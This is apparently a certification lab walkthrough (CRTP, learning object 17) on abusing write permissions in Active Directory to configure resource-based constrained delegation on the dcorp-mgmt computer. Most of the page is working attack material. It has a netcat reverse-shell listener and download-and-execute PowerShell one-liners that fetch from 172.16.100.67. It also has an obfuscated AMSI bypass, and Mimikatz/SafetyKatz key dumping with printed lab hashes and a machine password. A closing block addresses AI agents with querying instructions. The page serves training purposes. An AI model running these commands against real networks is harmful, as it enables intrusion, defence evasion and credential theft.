# 17 - LO1️7️ ## Tasks 1 - Find a computer object in dcorp domain where we have Write permissions 2 - Abuse the Write permissions to access that computer as Domain Admin Flag 28 \[dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩 ## Solutions ### 1 - Find a computer object in dcorp domain where we have Write permissions Let's use PowerView from a PowerShell session started using Invisi-Shell to enumerate Write permissions for a user that we have compromised. ```powershell C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\Powerview.ps1 Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} ``` ``` ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local AceQualifier : AccessAllowed ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite ObjectAceType : None AceFlags : None AceType : AccessAllowed InheritanceFlags : None SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121 IdentityReferenceName : ciadmin IdentityReferenceDomain : dollarcorp.moneycorp.local IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local IdentityReferenceClass : user ```

### 2 - Abuse the Write permissions to access that computer as Domain Admin Recall that we compromised ciadmin from dcorp-ci ([on learning object 5](/crtp-notes/readme/lab/5-lo-5.md)). We can either use the reverse shell we have on dcorp-ci as ciadmin or extract the credentials from dcorp-ci. Let's use the reverse shell that we have and load PowerView there: ```powershell C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339 iex (iwr http://172.16.100.67/sbloggingbypass.txt -UseBasicParsing) S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ```

```powershell iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.67/PowerView.ps1')) ``` Now, set RBCD on dcorp-mgmt for the student VMs. You may like to set it for all the student VMs in your lab instance so that your fellow students can also try it: ```powershell Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std867$' -Verbose ``` and check if RBCD is set correctly: ```powershell Get-DomainRBCD ```

Get AES keys of your student VM (as we configured RBCD for it above). Run the below command from an elevated shell: ```powershell C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit" ``` ```powershell mimikatz(commandline) # sekurlsa::evasive-keys Authentication Id : 0 ; 5060531 (00000000:004d37b3) Session : Interactive from 0 User Name : student867 Domain : dcorp Logon Server : DCORP-DC Logon Time : 5/18/2025 10:07:04 PM SID : S-1-5-21-719815819-3726368948-3917688648-20607 * Username : student867 * Domain : DOLLARCORP.MONEYCORP.LOCAL * Password : (null) * Key List : aes256_hmac a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1 rc4_hmac_nt 320e675610942d625c9a2aeaaf357b4a rc4_hmac_old 320e675610942d625c9a2aeaaf357b4a rc4_md4 320e675610942d625c9a2aeaaf357b4a rc4_hmac_nt_exp 320e675610942d625c9a2aeaaf357b4a rc4_hmac_old_exp 320e675610942d625c9a2aeaaf357b4a Authentication Id : 0 ; 282875 (00000000:000450fb) Session : RemoteInteractive from 2 User Name : student867 Domain : dcorp Logon Server : DCORP-DC Logon Time : 5/18/2025 3:18:24 PM SID : S-1-5-21-719815819-3726368948-3917688648-20607 * Username : student867 * Domain : DOLLARCORP.MONEYCORP.LOCAL * Password : (null) * Key List : aes256_hmac a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1 rc4_hmac_nt 320e675610942d625c9a2aeaaf357b4a rc4_hmac_old 320e675610942d625c9a2aeaaf357b4a rc4_md4 320e675610942d625c9a2aeaaf357b4a rc4_hmac_nt_exp 320e675610942d625c9a2aeaaf357b4a rc4_hmac_old_exp 320e675610942d625c9a2aeaaf357b4a Authentication Id : 0 ; 257517 (00000000:0003eded) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 5/18/2025 3:18:22 PM SID : S-1-5-90-0-2 * Username : DCORP-STD867$ * Domain : dollarcorp.moneycorp.local * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_

### Flag 28 \[dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩 ``` ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local AceQualifier : AccessAllowed ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite ObjectAceType : None AceFlags : None AceType : AccessAllowed InheritanceFlags : None SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121 IdentityReferenceName : ciadmin IdentityReferenceDomain : dollarcorp.moneycorp.local IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local IdentityReferenceClass : user ``` DCORP-MGMT is the computer account on which ciadmin can configure Resource-based Constrained Delegation. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dev-angelist.gitbook.io/crtp-notes/readme/lab/17-lo1-7.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.